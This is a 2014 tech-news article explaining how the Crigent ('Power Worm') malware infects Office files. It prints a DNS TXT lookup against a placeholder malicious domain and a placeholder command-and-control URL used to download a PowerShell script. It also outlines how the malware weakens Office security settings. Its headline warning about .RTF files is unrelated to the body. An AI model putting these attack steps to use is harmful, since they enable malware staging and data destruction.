Close Menu
Technotification
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    Technotification
    • Home
    • News
    • How To
    • Explained
    • Facts
    • Lists
    • Programming
    • Security
    • Gaming
    Technotification
    Home › Security › MS Word Hacked, Do not open ‘.RTF’ Files – Microsoft Warning!

    MS Word Hacked, Do not open ‘.RTF’ Files – Microsoft Warning!

    By Vikram Singh RaoMarch 30, 2014
    Facebook Twitter Reddit LinkedIn
    waistbelt

    Viruses and malware attacking the MS Office files is an age old favorite activity of hackers but the advent of new technologies such as cloud based technologies bring new sophistication to the hacking methods as is in the case of ‘Crigent’, or ‘Power Worm.’

    Instead of creating executable code, ‘Crigent’ uses legitimate technologies such as Windows PowerShell, Google DNS servers and cloud storage such as Dropbox or Microsoft’s OneDrive. Thus, the suspicious activity is ignored by network administrators.

    The attack can be divided into three logical main parts: acquiring the components; running commands; and infecting the files. These are briefly explained as follows.

    Acquiring the components:
    The process starts with a word or excel file on the computer that is infected with the virus. The attacker creates one subdomain each under two domains for which he has access to the DNS records. Instead of storing the files at an IP address which are pointed by these subdomains, the hacker stores a text (TXT) record in those DNS records which can be accessed by using public Google DNS server thus avoiding local DNS blocking. The command in Windows is:

    nslookup -querytype=TXT {malicious domain} 8.8.8.8

    In return, the hacker gets links two links each pointing to a legitimate cloud storage: Dropbox and OneDrive.

    Running commands:
    Tor and Polipo software, which are already installed, are used to access command-and-control server. The URL contains two GUIDs:

    {C&C server}/get.php?s=setup&mom={GUID #1}&uid={GUID #2}

    If the GUIDs, are correct then a PowerShell script is downloaded which contains all the codes necessary.

    Infecting the files:
    First, Crigent lowers the security settings of Microsoft Office using PowerShell to modify registry. Secondly, it disables all ‘alerts’ and ‘Macros’ so that the user is not alarmed. Thirdly, it searches for all word and excel files on the computer and converts all .DOCX and .XLSX files to .DOC and .XLS respectively and creates a Visual Basic module for them. Then deletes all the original files. When these files are opened then a chain reaction of infections starts which destroys all the files and makes them useless for the user resulting in potential loss of important data.

    These attacks can be avoided by being vigilant and removing any Tor and Polipo software. Microsoft Office by default uses only .DOCX or .XLSX file extensions since 2007 so presence of large number of files in .DOC or .XLS format, if not done intentionally, should be suspicious as well.

    Share. Facebook Twitter LinkedIn Tumblr Reddit Telegram WhatsApp
    Vikram Singh Rao
    • Website
    • Facebook
    • X (Twitter)
    • LinkedIn

    I am an entrepreneur at heart who has made his hobby turned a passion, his profession now.

    Related Posts

    The Psychology of a Phishing Email: How Scammers Play with Your Mind

    July 16, 2024

    9 Essential Elements of a Strong Cyber Security Management System

    July 3, 2024

    Common Cyber Attacks and How to Prevent Them

    July 3, 2024

    How Cyber Security Paid Training Prepares You for Real-World Threats

    June 13, 2024

    The Role of Security in Server Colocation Environments

    March 12, 2024

    Navigating the Waters: Best Practices for Phishing Testing in 2024

    February 19, 2024
    Lists You May Like

    10 Sites to Watch Free Korean Drama [2025 Edition]

    January 2, 2025

    The Pirate Bay Proxy List in 2025 [Updated List]

    January 2, 2025

    10 Best RARBG Alternative Sites in April 2025 [Working Links]

    April 1, 2025

    10 Best Torrent Search Engine Sites (2025 Edition)

    February 12, 2025

    10 Best GTA V Roleplay Servers in 2025 (Updated List)

    January 6, 2025

    5 Best Torrent Sites for Software in 2025

    January 2, 2025

    1337x Alternatives, Proxies, and Mirror Sites in 2025

    January 2, 2025

    10 Best Torrent Sites for eBooks in 2025 [Working]

    January 2, 2025

    10 Best Anime Torrent Sites in 2025 [Working Sites]

    January 6, 2025

    Top Free Photo Editing Software For PC in 2025

    January 2, 2025
    Pages
    • About
    • Contact
    • Privacy
    • Careers
    Privacy

    Information such as the type of browser being used, its operating system, and your IP address is gathered in order to enhance your online experience.

    © 2013 - 2025 Technotification | All rights reserved.

    Type above and press Enter to search. Press Esc to cancel.